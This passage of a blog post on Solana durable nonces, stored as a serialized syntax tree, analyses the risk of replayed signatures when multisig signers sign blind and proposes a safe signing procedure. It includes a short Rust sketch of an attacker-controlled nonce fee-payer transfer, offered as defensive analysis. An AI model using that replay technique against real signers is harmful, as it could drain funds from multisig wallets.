tx",{"type":24,"tag":301,"props":74991,"children":74992},{"style":385},[74993],{"type":30,"value":206},{"type":24,"tag":301,"props":74995,"children":74996},{"style":314},[74997],{"type":30,"value":74749},{"type":24,"tag":301,"props":74999,"children":75000},{"style":359},[75001],{"type":30,"value":10318},{"type":24,"tag":301,"props":75003,"children":75004},{"class":303,"line":495},[75005,75010],{"type":24,"tag":301,"props":75006,"children":75007},{"style":369},[75008],{"type":30,"value":75009}," next_durable_nonce",{"type":24,"tag":301,"props":75011,"children":75012},{"style":359},[75013],{"type":30,"value":1729},{"type":24,"tag":301,"props":75015,"children":75016},{"class":303,"line":504},[75017,75022],{"type":24,"tag":301,"props":75018,"children":75019},{"style":369},[75020],{"type":30,"value":75021}," next_lamports_per_signature",{"type":24,"tag":301,"props":75023,"children":75024},{"style":359},[75025],{"type":30,"value":1729},{"type":24,"tag":301,"props":75027,"children":75028},{"class":303,"line":512},[75029],{"type":24,"tag":301,"props":75030,"children":75031},{"style":359},[75032],{"type":30,"value":75033}," )\n",{"type":24,"tag":301,"props":75035,"children":75036},{"class":303,"line":592},[75037],{"type":24,"tag":301,"props":75038,"children":75039},{"style":359},[75040],{"type":30,"value":35943},{"type":24,"tag":301,"props":75042,"children":75043},{"class":303,"line":619},[75044,75048,75052,75056],{"type":24,"tag":301,"props":75045,"children":75046},{"style":10246},[75047],{"type":30,"value":21603},{"type":24,"tag":301,"props":75049,"children":75050},{"style":359},[75051],{"type":30,"value":362},{"type":24,"tag":301,"props":75053,"children":75054},{"style":10246},[75055],{"type":30,"value":74848},{"type":24,"tag":301,"props":75057,"children":75058},{"style":359},[75059],{"type":30,"value":3035},{"type":24,"tag":301,"props":75061,"children":75062},{"class":303,"line":635},[75063,75067,75071,75075,75079,75083],{"type":24,"tag":301,"props":75064,"children":75065},{"style":369},[75066],{"type":30,"value":74860},{"type":24,"tag":301,"props":75068,"children":75069},{"style":385},[75070],{"type":30,"value":1679},{"type":24,"tag":301,"props":75072,"children":75073},{"style":10246},[75074],{"type":30,"value":34065},{"type":24,"tag":301,"props":75076,"children":75077},{"style":359},[75078],{"type":30,"value":362},{"type":24,"tag":301,"props":75080,"children":75081},{"style":369},[75082],{"type":30,"value":74942},{"type":24,"tag":301,"props":75084,"children":75085},{"style":359},[75086],{"type":30,"value":4656},{"type":24,"tag":301,"props":75088,"children":75089},{"class":303,"line":643},[75090,75094,75098,75103],{"type":24,"tag":301,"props":75091,"children":75092},{"style":369},[75093],{"type":30,"value":74880},{"type":24,"tag":301,"props":75095,"children":75096},{"style":385},[75097],{"type":30,"value":1679},{"type":24,"tag":301,"props":75099,"children":75100},{"style":369},[75101],{"type":30,"value":75102}," previous_lamports_per_signature",{"type":24,"tag":301,"props":75104,"children":75105},{"style":359},[75106],{"type":30,"value":1729},{"type":24,"tag":301,"props":75108,"children":75109},{"class":303,"line":652},[75110],{"type":24,"tag":301,"props":75111,"children":75112},{"style":359},[75113],{"type":30,"value":74910},{"type":24,"tag":301,"props":75115,"children":75116},{"class":303,"line":666},[75117,75121,75125],{"type":24,"tag":301,"props":75118,"children":75119},{"style":359},[75120],{"type":30,"value":22565},{"type":24,"tag":301,"props":75122,"children":75123},{"style":308},[75124],{"type":30,"value":10144},{"type":24,"tag":301,"props":75126,"children":75127},{"style":359},[75128],{"type":30,"value":3035},{"type":24,"tag":301,"props":75130,"children":75131},{"class":303,"line":674},[75132,75137,75141,75146,75151,75155],{"type":24,"tag":301,"props":75133,"children":75134},{"style":369},[75135],{"type":30,"value":75136}," error_counters",{"type":24,"tag":301,"props":75138,"children":75139},{"style":385},[75140],{"type":30,"value":206},{"type":24,"tag":301,"props":75142,"children":75143},{"style":359},[75144],{"type":30,"value":75145},"blockhash_not_found ",{"type":24,"tag":301,"props":75147,"children":75148},{"style":385},[75149],{"type":30,"value":75150},"+=",{"type":24,"tag":301,"props":75152,"children":75153},{"style":466},[75154],{"type":30,"value":487},{"type":24,"tag":301,"props":75156,"children":75157},{"style":359},[75158],{"type":30,"value":492},{"type":24,"tag":301,"props":75160,"children":75161},{"class":303,"line":692},[75162,75166,75170,75175,75179,75184],{"type":24,"tag":301,"props":75163,"children":75164},{"style":10246},[75165],{"type":30,"value":21645},{"type":24,"tag":301,"props":75167,"children":75168},{"style":359},[75169],{"type":30,"value":362},{"type":24,"tag":301,"props":75171,"children":75172},{"style":10246},[75173],{"type":30,"value":75174},"TransactionError",{"type":24,"tag":301,"props":75176,"children":75177},{"style":385},[75178],{"type":30,"value":10308},{"type":24,"tag":301,"props":75180,"children":75181},{"style":10246},[75182],{"type":30,"value":75183},"BlockhashNotFound",{"type":24,"tag":301,"props":75185,"children":75186},{"style":359},[75187],{"type":30,"value":791},{"type":24,"tag":301,"props":75189,"children":75190},{"class":303,"line":3631},[75191],{"type":24,"tag":301,"props":75192,"children":75193},{"style":359},[75194],{"type":30,"value":501},{"type":24,"tag":32,"props":75196,"children":75197},{},[75198],{"type":30,"value":75199},"The documentation does a good job of explaining how they work.",{"type":24,"tag":9770,"props":75201,"children":75202},{},[75203],{"type":24,"tag":32,"props":75204,"children":75205},{},[75206],{"type":30,"value":75207},"Durable Transaction Nonces, which are 32-byte in length (usually represented as base58 encoded strings), are used in place of recent blockhashes to make every transaction unique (to avoid double-spending) while removing the mortality on the unexecuted transaction.",{"type":24,"tag":32,"props":75209,"children":75210},{},[75211,75213,75220],{"type":30,"value":75212},"Durable nonces are created and managed ",{"type":24,"tag":188,"props":75214,"children":75217},{"href":75215,"rel":75216},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/programs/system/src/system_processor.rs#L446",[192],[75218],{"type":30,"value":75219},"by the system program",{"type":30,"value":75221},". They don't have a fixed PDA, so each account can have multiple associated nonces.",{"type":24,"tag":32,"props":75223,"children":75224},{},[75225,75227,75234],{"type":30,"value":75226},"After a durable nonce is used, it'll be \"advanced\" to preventing replay attacks. The new nonce is calculated ",{"type":24,"tag":188,"props":75228,"children":75231},{"href":75229,"rel":75230},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L81",[192],[75232],{"type":30,"value":75233},"based on the current blockhash",{"type":30,"value":75235},", and cannot be predicted in advance.",{"type":24,"tag":291,"props":75237,"children":75239},{"className":9818,"code":75238,"language":9817,"meta":7,"style":7}," let hash_queue = self.blockhash_queue.read().unwrap();\n let last_blockhash = hash_queue.last_hash();\n let next_durable_nonce = DurableNonce::from_blockhash(&last_blockhash);\n",[75240],{"type":24,"tag":145,"props":75241,"children":75242},{"__ignoreMap":7},[75243,75295,75328],{"type":24,"tag":301,"props":75244,"children":75245},{"class":303,"line":304},[75246,75250,75254,75258,75262,75266,75271,75275,75279,75283,75287,75291],{"type":24,"tag":301,"props":75247,"children":75248},{"style":348},[75249],{"type":30,"value":9838},{"type":24,"tag":301,"props":75251,"children":75252},{"style":369},[75253],{"type":30,"value":74803},{"type":24,"tag":301,"props":75255,"children":75256},{"style":385},[75257],{"type":30,"value":2537},{"type":24,"tag":301,"props":75259,"children":75260},{"style":348},[75261],{"type":30,"value":20590},{"type":24,"tag":301,"props":75263,"children":75264},{"style":385},[75265],{"type":30,"value":206},{"type":24,"tag":301,"props":75267,"children":75268},{"style":359},[75269],{"type":30,"value":75270},"blockhash_queue",{"type":24,"tag":301,"props":75272,"children":75273},{"style":385},[75274],{"type":30,"value":206},{"type":24,"tag":301,"props":75276,"children":75277},{"style":314},[75278],{"type":30,"value":67354},{"type":24,"tag":301,"props":75280,"children":75281},{"style":359},[75282],{"type":30,"value":20672},{"type":24,"tag":301,"props":75284,"children":75285},{"style":385},[75286],{"type":30,"value":206},{"type":24,"tag":301,"props":75288,"children":75289},{"style":314},[75290],{"type":30,"value":10492},{"type":24,"tag":301,"props":75292,"children":75293},{"style":359},[75294],{"type":30,"value":4859},{"type":24,"tag":301,"props":75296,"children":75297},{"class":303,"line":320},[75298,75302,75307,75311,75315,75319,75324],{"type":24,"tag":301,"props":75299,"children":75300},{"style":348},[75301],{"type":30,"value":9838},{"type":24,"tag":301,"props":75303,"children":75304},{"style":369},[75305],{"type":30,"value":75306}," last_blockhash",{"type":24,"tag":301,"props":75308,"children":75309},{"style":385},[75310],{"type":30,"value":2537},{"type":24,"tag":301,"props":75312,"children":75313},{"style":369},[75314],{"type":30,"value":74803},{"type":24,"tag":301,"props":75316,"children":75317},{"style":385},[75318],{"type":30,"value":206},{"type":24,"tag":301,"props":75320,"children":75321},{"style":314},[75322],{"type":30,"value":75323},"last_hash",{"type":24,"tag":301,"props":75325,"children":75326},{"style":359},[75327],{"type":30,"value":4859},{"type":24,"tag":301,"props":75329,"children":75330},{"class":303,"line":335},[75331,75335,75340,75344,75349,75353,75358,75362,75366,75371],{"type":24,"tag":301,"props":75332,"children":75333},{"style":348},[75334],{"type":30,"value":9838},{"type":24,"tag":301,"props":75336,"children":75337},{"style":369},[75338],{"type":30,"value":75339}," next_durable_nonce",{"type":24,"tag":301,"props":75341,"children":75342},{"style":385},[75343],{"type":30,"value":2537},{"type":24,"tag":301,"props":75345,"children":75346},{"style":10246},[75347],{"type":30,"value":75348}," DurableNonce",{"type":24,"tag":301,"props":75350,"children":75351},{"style":385},[75352],{"type":30,"value":10308},{"type":24,"tag":301,"props":75354,"children":75355},{"style":314},[75356],{"type":30,"value":75357},"from_blockhash",{"type":24,"tag":301,"props":75359,"children":75360},{"style":359},[75361],{"type":30,"value":362},{"type":24,"tag":301,"props":75363,"children":75364},{"style":385},[75365],{"type":30,"value":556},{"type":24,"tag":301,"props":75367,"children":75368},{"style":369},[75369],{"type":30,"value":75370},"last_blockhash",{"type":24,"tag":301,"props":75372,"children":75373},{"style":359},[75374],{"type":30,"value":589},{"type":24,"tag":32,"props":75376,"children":75377},{},[75378,75380,75385],{"type":30,"value":75379},"This has an important consequence for our threat model. Unlike recent blockhash transactions, durable nonce transactions ",{"type":24,"tag":5422,"props":75381,"children":75382},{},[75383],{"type":30,"value":75384},"can",{"type":30,"value":75386}," be saved and reused.",{"type":24,"tag":43,"props":75388,"children":75390},{"id":75389},"threat-model",[75391],{"type":30,"value":75392},"Threat Model",{"type":24,"tag":32,"props":75394,"children":75395},{},[75396],{"type":30,"value":75397},"Let's consider a simplified form of the original question.",{"type":24,"tag":6246,"props":75399,"children":75400},{},[75401,75406,75411],{"type":24,"tag":2659,"props":75402,"children":75403},{},[75404],{"type":30,"value":75405},"We have a N/M multisig",{"type":24,"tag":2659,"props":75407,"children":75408},{},[75409],{"type":30,"value":75410},"Signers are unable to see what they're signing, both with respect to content and quantity of signatures. This is roughly equivalent to blind signing transactions.",{"type":24,"tag":2659,"props":75412,"children":75413},{},[75414],{"type":30,"value":75415},"We can accurately query chain state.",{"type":24,"tag":32,"props":75417,"children":75418},{},[75419],{"type":30,"value":75420},"Can we safely sign transactions?",{"type":24,"tag":32,"props":75422,"children":75423},{},[75424],{"type":30,"value":75425},"One observation is that this problem is very hard to solve with durable nonces. By signing durable nonce transactions, an attacker could collect signatures and replay them at some indeterminite future point.",{"type":24,"tag":32,"props":75427,"children":75428},{},[75429,75431,75437,75439,75446],{"type":30,"value":75430},"Durable nonces require an onchain account, and it's possible to use a ",{"type":24,"tag":145,"props":75432,"children":75434},{"className":75433},[],[75435],{"type":30,"value":75436},"getProgramAccounts",{"type":30,"value":75438}," call to validate if your signer ",{"type":24,"tag":188,"props":75440,"children":75443},{"href":75441,"rel":75442},"https://solana.stackexchange.com/questions/9650/is-there-any-way-to-get-nonce-accounts-of-an-authorized-account",[192],[75444],{"type":30,"value":75445},"has an associated durable nonce",{"type":30,"value":206},{"type":24,"tag":291,"props":75448,"children":75450},{"className":42674,"code":75449,"language":42676,"meta":7,"style":7},"const connection = new Connection(clusterApiUrl('testnet'));\nconst nonceAccounts = await connection.getProgramAccounts(\n // The system program owns all nonce accounts.\n SYSTEM_PROGRAM_ADDRESS,\n {\n filters: [\n {\n // Nonce accounts are exactly 80 bytes long\n dataSize: 80,\n },\n {\n // The authority's 32-byte public key is written\n // into bytes 8-40 of the nonce's account data.\n memcmp: {\n bytes: AUTHORITY_PUBLIC_KEY.toBase58(),\n offset: 8,\n },\n },\n ],\n }\n);\n",[75451],{"type":24,"tag":145,"props":75452,"children":75453},{"__ignoreMap":7},[75454,75501,75537,75545,75557,75565,75577,75585,75593,75610,75617,75624,75632,75640,75652,75678,75695,75702,75709,75717,75724],{"type":24,"tag":301,"props":75455,"children":75456},{"class":303,"line":304},[75457,75461,75466,75470,75474,75479,75483,75488,75492,75497],{"type":24,"tag":301,"props":75458,"children":75459},{"style":348},[75460],{"type":30,"value":16460},{"type":24,"tag":301,"props":75462,"children":75463},{"style":369},[75464],{"type":30,"value":75465}," connection",{"type":24,"tag":301,"props":75467,"children":75468},{"style":385},[75469],{"type":30,"value":2537},{"type":24,"tag":301,"props":75471,"children":75472},{"style":348},[75473],{"type":30,"value":38685},{"type":24,"tag":301,"props":75475,"children":75476},{"style":314},[75477],{"type":30,"value":75478}," Connection",{"type":24,"tag":301,"props":75480,"children":75481},{"style":359},[75482],{"type":30,"value":362},{"type":24,"tag":301,"props":75484,"children":75485},{"style":314},[75486],{"type":30,"value":75487},"clusterApiUrl",{"type":24,"tag":301,"props":75489,"children":75490},{"style":359},[75491],{"type":30,"value":362},{"type":24,"tag":301,"props":75493,"children":75494},{"style":329},[75495],{"type":30,"value":75496},"'testnet'",{"type":24,"tag":301,"props":75498,"children":75499},{"style":359},[75500],{"type":30,"value":3416},{"type":24,"tag":301,"props":75502,"children":75503},{"class":303,"line":320},[75504,75508,75513,75517,75521,75525,75529,75533],{"type":24,"tag":301,"props":75505,"children":75506},{"style":348},[75507],{"type":30,"value":16460},{"type":24,"tag":301,"props":75509,"children":75510},{"style":369},[75511],{"type":30,"value":75512}," nonceAccounts",{"type":24,"tag":301,"props":75514,"children":75515},{"style":385},[75516],{"type":30,"value":2537},{"type":24,"tag":301,"props":75518,"children":75519},{"style":308},[75520],{"type":30,"value":4617},{"type":24,"tag":301,"props":75522,"children":75523},{"style":369},[75524],{"type":30,"value":75465},{"type":24,"tag":301,"props":75526,"children":75527},{"style":359},[75528],{"type":30,"value":206},{"type":24,"tag":301,"props":75530,"children":75531},{"style":314},[75532],{"type":30,"value":75436},{"type":24,"tag":301,"props":75534,"children":75535},{"style":359},[75536],{"type":30,"value":1707},{"type":24,"tag":301,"props":75538,"children":75539},{"class":303,"line":335},[75540],{"type":24,"tag":301,"props":75541,"children":75542},{"style":1062},[75543],{"type":30,"value":75544}," // The system program owns all nonce accounts.\n",{"type":24,"tag":301,"props":75546,"children":75547},{"class":303,"line":344},[75548,75553],{"type":24,"tag":301,"props":75549,"children":75550},{"style":369},[75551],{"type":30,"value":75552}," SYSTEM_PROGRAM_ADDRESS",{"type":24,"tag":301,"props":75554,"children":75555},{"style":359},[75556],{"type":30,"value":1729},{"type":24,"tag":301,"props":75558,"children":75559},{"class":303,"line":401},[75560],{"type":24,"tag":301,"props":75561,"children":75562},{"style":359},[75563],{"type":30,"value":75564}," {\n",{"type":24,"tag":301,"props":75566,"children":75567},{"class":303,"line":415},[75568,75573],{"type":24,"tag":301,"props":75569,"children":75570},{"style":369},[75571],{"type":30,"value":75572}," filters:",{"type":24,"tag":301,"props":75574,"children":75575},{"style":359},[75576],{"type":30,"value":32377},{"type":24,"tag":301,"props":75578,"children":75579},{"class":303,"line":439},[75580],{"type":24,"tag":301,"props":75581,"children":75582},{"style":359},[75583],{"type":30,"value":75584}," {\n",{"type":24,"tag":301,"props":75586,"children":75587},{"class":303,"line":447},[75588],{"type":24,"tag":301,"props":75589,"children":75590},{"style":1062},[75591],{"type":30,"value":75592}," // Nonce accounts are exactly 80 bytes long\n",{"type":24,"tag":301,"props":75594,"children":75595},{"class":303,"line":476},[75596,75601,75606],{"type":24,"tag":301,"props":75597,"children":75598},{"style":369},[75599],{"type":30,"value":75600}," dataSize:",{"type":24,"tag":301,"props":75602,"children":75603},{"style":466},[75604],{"type":30,"value":75605}," 80",{"type":24,"tag":301,"props":75607,"children":75608},{"style":359},[75609],{"type":30,"value":1729},{"type":24,"tag":301,"props":75611,"children":75612},{"class":303,"line":495},[75613],{"type":24,"tag":301,"props":75614,"children":75615},{"style":359},[75616],{"type":30,"value":6903},{"type":24,"tag":301,"props":75618,"children":75619},{"class":303,"line":504},[75620],{"type":24,"tag":301,"props":75621,"children":75622},{"style":359},[75623],{"type":30,"value":75584},{"type":24,"tag":301,"props":75625,"children":75626},{"class":303,"line":512},[75627],{"type":24,"tag":301,"props":75628,"children":75629},{"style":1062},[75630],{"type":30,"value":75631}," // The authority's 32-byte public key is written\n",{"type":24,"tag":301,"props":75633,"children":75634},{"class":303,"line":592},[75635],{"type":24,"tag":301,"props":75636,"children":75637},{"style":1062},[75638],{"type":30,"value":75639}," // into bytes 8-40 of the nonce's account data.\n",{"type":24,"tag":301,"props":75641,"children":75642},{"class":303,"line":619},[75643,75648],{"type":24,"tag":301,"props":75644,"children":75645},{"style":369},[75646],{"type":30,"value":75647}," memcmp:",{"type":24,"tag":301,"props":75649,"children":75650},{"style":359},[75651],{"type":30,"value":3035},{"type":24,"tag":301,"props":75653,"children":75654},{"class":303,"line":635},[75655,75660,75665,75669,75674],{"type":24,"tag":301,"props":75656,"children":75657},{"style":369},[75658],{"type":30,"value":75659}," bytes:",{"type":24,"tag":301,"props":75661,"children":75662},{"style":369},[75663],{"type":30,"value":75664}," AUTHORITY_PUBLIC_KEY",{"type":24,"tag":301,"props":75666,"children":75667},{"style":359},[75668],{"type":30,"value":206},{"type":24,"tag":301,"props":75670,"children":75671},{"style":314},[75672],{"type":30,"value":75673},"toBase58",{"type":24,"tag":301,"props":75675,"children":75676},{"style":359},[75677],{"type":30,"value":10318},{"type":24,"tag":301,"props":75679,"children":75680},{"class":303,"line":643},[75681,75686,75691],{"type":24,"tag":301,"props":75682,"children":75683},{"style":369},[75684],{"type":30,"value":75685}," offset:",{"type":24,"tag":301,"props":75687,"children":75688},{"style":466},[75689],{"type":30,"value":75690}," 8",{"type":24,"tag":301,"props":75692,"children":75693},{"style":359},[75694],{"type":30,"value":1729},{"type":24,"tag":301,"props":75696,"children":75697},{"class":303,"line":652},[75698],{"type":24,"tag":301,"props":75699,"children":75700},{"style":359},[75701],{"type":30,"value":32129},{"type":24,"tag":301,"props":75703,"children":75704},{"class":303,"line":666},[75705],{"type":24,"tag":301,"props":75706,"children":75707},{"style":359},[75708],{"type":30,"value":6903},{"type":24,"tag":301,"props":75710,"children":75711},{"class":303,"line":674},[75712],{"type":24,"tag":301,"props":75713,"children":75714},{"style":359},[75715],{"type":30,"value":75716}," ],\n",{"type":24,"tag":301,"props":75718,"children":75719},{"class":303,"line":692},[75720],{"type":24,"tag":301,"props":75721,"children":75722},{"style":359},[75723],{"type":30,"value":6918},{"type":24,"tag":301,"props":75725,"children":75726},{"class":303,"line":3631},[75727],{"type":24,"tag":301,"props":75728,"children":75729},{"style":359},[75730],{"type":30,"value":589},{"type":24,"tag":32,"props":75732,"children":75733},{},[75734,75736,75744],{"type":30,"value":75735},"Unfortunately this is not sufficient",{"type":24,"tag":22262,"props":75737,"children":75738},{},[75739],{"type":24,"tag":188,"props":75740,"children":75742},{"href":36380,"ariaDescribedBy":75741,"dataFootnoteRef":7,"id":36382},[22269],[75743],{"type":30,"value":546},{"type":30,"value":75745},". A transaction may have multiple signers, and an attacker could use their own durable nonce fee-payer. This means our problem as defined above is unfortunately unsolvable.",{"type":24,"tag":291,"props":75747,"children":75749},{"className":9818,"code":75748,"language":9817,"meta":7,"style":7}," let instruction = system_instruction::transfer(&from, &ledger_base_pubkey, 42);\n let message =\n Message::new_with_nonce(vec![instruction], Some(&evil_nonce_authority), &nonce_account, &evil_nonce_authority)\n .serialize();\n",[75750],{"type":24,"tag":145,"props":75751,"children":75752},{"__ignoreMap":7},[75753,75819,75835,75918],{"type":24,"tag":301,"props":75754,"children":75755},{"class":303,"line":304},[75756,75760,75764,75768,75773,75777,75781,75785,75789,75793,75797,75801,75806,75810,75815],{"type":24,"tag":301,"props":75757,"children":75758},{"style":348},[75759],{"type":30,"value":9838},{"type":24,"tag":301,"props":75761,"children":75762},{"style":369},[75763],{"type":30,"value":50107},{"type":24,"tag":301,"props":75765,"children":75766},{"style":385},[75767],{"type":30,"value":2537},{"type":24,"tag":301,"props":75769,"children":75770},{"style":359},[75771],{"type":30,"value":75772}," system_instruction",{"type":24,"tag":301,"props":75774,"children":75775},{"style":385},[75776],{"type":30,"value":10308},{"type":24,"tag":301,"props":75778,"children":75779},{"style":314},[75780],{"type":30,"value":38875},{"type":24,"tag":301,"props":75782,"children":75783},{"style":359},[75784],{"type":30,"value":362},{"type":24,"tag":301,"props":75786,"children":75787},{"style":385},[75788],{"type":30,"value":556},{"type":24,"tag":301,"props":75790,"children":75791},{"style":369},[75792],{"type":30,"value":26245},{"type":24,"tag":301,"props":75794,"children":75795},{"style":359},[75796],{"type":30,"value":377},{"type":24,"tag":301,"props":75798,"children":75799},{"style":385},[75800],{"type":30,"value":556},{"type":24,"tag":301,"props":75802,"children":75803},{"style":369},[75804],{"type":30,"value":75805},"ledger_base_pubkey",{"type":24,"tag":301,"props":75807,"children":75808},{"style":359},[75809],{"type":30,"value":377},{"type":24,"tag":301,"props":75811,"children":75812},{"style":466},[75813],{"type":30,"value":75814},"42",{"type":24,"tag":301,"props":75816,"children":75817},{"style":359},[75818],{"type":30,"value":589},{"type":24,"tag":301,"props":75820,"children":75821},{"class":303,"line":320},[75822,75826,75831],{"type":24,"tag":301,"props":75823,"children":75824},{"style":348},[75825],{"type":30,"value":9838},{"type":24,"tag":301,"props":75827,"children":75828},{"style":369},[75829],{"type":30,"value":75830}," message",{"type":24,"tag":301,"props":75832,"children":75833},{"style":385},[75834],{"type":30,"value":42599},{"type":24,"tag":301,"props":75836,"children":75837},{"class":303,"line":335},[75838,75843,75847,75852,75856,75860,75864,75868,75872,75876,75880,75884,75889,75893,75897,75902,75906,75910,75914],{"type":24,"tag":301,"props":75839,"children":75840},{"style":10246},[75841],{"type":30,"value":75842}," Message",{"type":24,"tag":301,"props":75844,"children":75845},{"style":385},[75846],{"type":30,"value":10308},{"type":24,"tag":301,"props":75848,"children":75849},{"style":314},[75850],{"type":30,"value":75851},"new_with_nonce",{"type":24,"tag":301,"props":75853,"children":75854},{"style":359},[75855],{"type":30,"value":362},{"type":24,"tag":301,"props":75857,"children":75858},{"style":314},[75859],{"type":30,"value":10700},{"type":24,"tag":301,"props":75861,"children":75862},{"style":359},[75863],{"type":30,"value":541},{"type":24,"tag":301,"props":75865,"children":75866},{"style":369},[75867],{"type":30,"value":50414},{"type":24,"tag":301,"props":75869,"children":75870},{"style":359},[75871],{"type":30,"value":551},{"type":24,"tag":301,"props":75873,"children":75874},{"style":10246},[75875],{"type":30,"value":48756},{"type":24,"tag":301,"props":75877,"children":75878},{"style":359},[75879],{"type":30,"value":362},{"type":24,"tag":301,"props":75881,"children":75882},{"style":385},[75883],{"type":30,"value":556},{"type":24,"tag":301,"props":75885,"children":75886},{"style":369},[75887],{"type":30,"value":75888},"evil_nonce_authority",{"type":24,"tag":301,"props":75890,"children":75891},{"style":359},[75892],{"type":30,"value":21967},{"type":24,"tag":301,"props":75894,"children":75895},{"style":385},[75896],{"type":30,"value":556},{"type":24,"tag":301,"props":75898,"children":75899},{"style":369},[75900],{"type":30,"value":75901},"nonce_account",{"type":24,"tag":301,"props":75903,"children":75904},{"style":359},[75905],{"type":30,"value":377},{"type":24,"tag":301,"props":75907,"children":75908},{"style":385},[75909],{"type":30,"value":556},{"type":24,"tag":301,"props":75911,"children":75912},{"style":369},[75913],{"type":30,"value":75888},{"type":24,"tag":301,"props":75915,"children":75916},{"style":359},[75917],{"type":30,"value":791},{"type":24,"tag":301,"props":75919,"children":75920},{"class":303,"line":344},[75921,75925,75930],{"type":24,"tag":301,"props":75922,"children":75923},{"style":385},[75924],{"type":30,"value":9999},{"type":24,"tag":301,"props":75926,"children":75927},{"style":314},[75928],{"type":30,"value":75929},"serialize",{"type":24,"tag":301,"props":75931,"children":75932},{"style":359},[75933],{"type":30,"value":4859},{"type":24,"tag":32,"props":75935,"children":75936},{},[75937,75939,75946],{"type":30,"value":75938},"Luckily, it is tractable with a small modification. What if the signer is allowed to observe the fee-payer on the transaction? For example, Ledger ",{"type":24,"tag":188,"props":75940,"children":75943},{"href":75941,"rel":75942},"https://github.com/LedgerHQ/app-solana/blob/a19da6c301541390bd08731a10f1f128b38ee66e/src/handle_sign_message.c#L97",[192],[75944],{"type":30,"value":75945},"logs the fee-payer here",{"type":30,"value":206},{"type":24,"tag":291,"props":75948,"children":75950},{"className":295,"code":75949,"language":294,"meta":7,"style":7},"bool print_config_show_authority(const PrintConfig* print_config, const Pubkey* authority) {\n return print_config->expert_mode || !pubkeys_equal(print_config->signer_pubkey, authority);\n}\n",[75951],{"type":24,"tag":145,"props":75952,"children":75953},{"__ignoreMap":7},[75954,76013,76069],{"type":24,"tag":301,"props":75955,"children":75956},{"class":303,"line":304},[75957,75961,75966,75970,75974,75979,75983,75988,75992,75996,76000,76004,76009],{"type":24,"tag":301,"props":75958,"children":75959},{"style":348},[75960],{"type":30,"value":36442},{"type":24,"tag":301,"props":75962,"children":75963},{"style":314},[75964],{"type":30,"value":75965}," print_config_show_authority",{"type":24,"tag":301,"props":75967,"children":75968},{"style":359},[75969],{"type":30,"value":362},{"type":24,"tag":301,"props":75971,"children":75972},{"style":348},[75973],{"type":30,"value":16460},{"type":24,"tag":301,"props":75975,"children":75976},{"style":359},[75977],{"type":30,"value":75978}," PrintConfig",{"type":24,"tag":301,"props":75980,"children":75981},{"style":385},[75982],{"type":30,"value":772},{"type":24,"tag":301,"props":75984,"children":75985},{"style":369},[75986],{"type":30,"value":75987}," print_config",{"type":24,"tag":301,"props":75989,"children":75990},{"style":359},[75991],{"type":30,"value":377},{"type":24,"tag":301,"props":75993,"children":75994},{"style":348},[75995],{"type":30,"value":16460},{"type":24,"tag":301,"props":75997,"children":75998},{"style":359},[75999],{"type":30,"value":27626},{"type":24,"tag":301,"props":76001,"children":76002},{"style":385},[76003],{"type":30,"value":772},{"type":24,"tag":301,"props":76005,"children":76006},{"style":369},[76007],{"type":30,"value":76008}," authority",{"type":24,"tag":301,"props":76010,"children":76011},{"style":359},[76012],{"type":30,"value":398},{"type":24,"tag":301,"props":76014,"children":76015},{"class":303,"line":320},[76016,76020,76024,76028,76033,76037,76041,76046,76050,76055,76059,76064],{"type":24,"tag":301,"props":76017,"children":76018},{"style":308},[76019],{"type":30,"value":680},{"type":24,"tag":301,"props":76021,"children":76022},{"style":369},[76023],{"type":30,"value":75987},{"type":24,"tag":301,"props":76025,"children":76026},{"style":359},[76027],{"type":30,"value":882},{"type":24,"tag":301,"props":76029,"children":76030},{"style":369},[76031],{"type":30,"value":76032},"expert_mode",{"type":24,"tag":301,"props":76034,"children":76035},{"style":385},[76036],{"type":30,"value":3308},{"type":24,"tag":301,"props":76038,"children":76039},{"style":385},[76040],{"type":30,"value":19659},{"type":24,"tag":301,"props":76042,"children":76043},{"style":314},[76044],{"type":30,"value":76045},"pubkeys_equal",{"type":24,"tag":301,"props":76047,"children":76048},{"style":359},[76049],{"type":30,"value":362},{"type":24,"tag":301,"props":76051,"children":76052},{"style":369},[76053],{"type":30,"value":76054},"print_config",{"type":24,"tag":301,"props":76056,"children":76057},{"style":359},[76058],{"type":30,"value":882},{"type":24,"tag":301,"props":76060,"children":76061},{"style":369},[76062],{"type":30,"value":76063},"signer_pubkey",{"type":24,"tag":301,"props":76065,"children":76066},{"style":359},[76067],{"type":30,"value":76068},", authority);\n",{"type":24,"tag":301,"props":76070,"children":76071},{"class":303,"line":335},[76072],{"type":24,"tag":301,"props":76073,"children":76074},{"style":359},[76075],{"type":30,"value":698},{"type":24,"tag":32,"props":76077,"children":76078},{},[76079],{"type":30,"value":76080},"Let's say we've determined our signer has no associated nonce accounts. If our pubkey is the fee-payer on the new proposed transaction, we can know for sure that the transaction does not use durable nonces!",{"type":24,"tag":32,"props":76082,"children":76083},{},[76084],{"type":30,"value":76085},"Without durable nonces, the problem becomes much easier to solve. After waiting enough time, there'll be a point where all previously signed transactions will be expired. If we see no unexpected transactions, that means we're safe.",{"type":24,"tag":32,"props":76087,"children":76088},{},[76089],{"type":30,"value":76090},"We can then use the following procedure.",{"type":24,"tag":6246,"props":76092,"children":76093},{},[76094,76099,76104,76109,76114],{"type":24,"tag":2659,"props":76095,"children":76096},{},[76097],{"type":30,"value":76098},"Ensure all signers have no durable nonce accounts.",{"type":24,"tag":2659,"props":76100,"children":76101},{},[76102],{"type":30,"value":76103},"The first signer signs and submits the transaction.",{"type":24,"tag":2659,"props":76105,"children":76106},{},[76107],{"type":30,"value":76108},"Wait two minutes for all recent blockhashes to expire.",{"type":24,"tag":2659,"props":76110,"children":76111},{},[76112],{"type":30,"value":76113},"Observe recent transactions associated with the signer to ensure nothing unexpected is submitted.",{"type":24,"tag":2659,"props":76115,"children":76116},{},[76117],{"type":30,"value":76118},"Repeat steps 2 to 4 for each signer",{"type":24,"tag":43,"props":76120,"children":76122},{"id":76121},"beyond",[76123],{"type":30,"value":76124},"Beyond",{"type":24,"tag":32,"props":76126,"children":76127},{},[76128],{"type":30,"value":76129},"Solana's signature model is unique. What can protocols do if they're deploying on blockchains without these unique properties? The most important constraint is observability. There must be a way you can see what you're signing, either while signing or implicitly after the fact.",{"type":24,"tag":32,"props":76131,"children":76132},{},[76133,76135,76142],{"type":30,"value":76134},"For example, pcaversaccio wrote a tool to 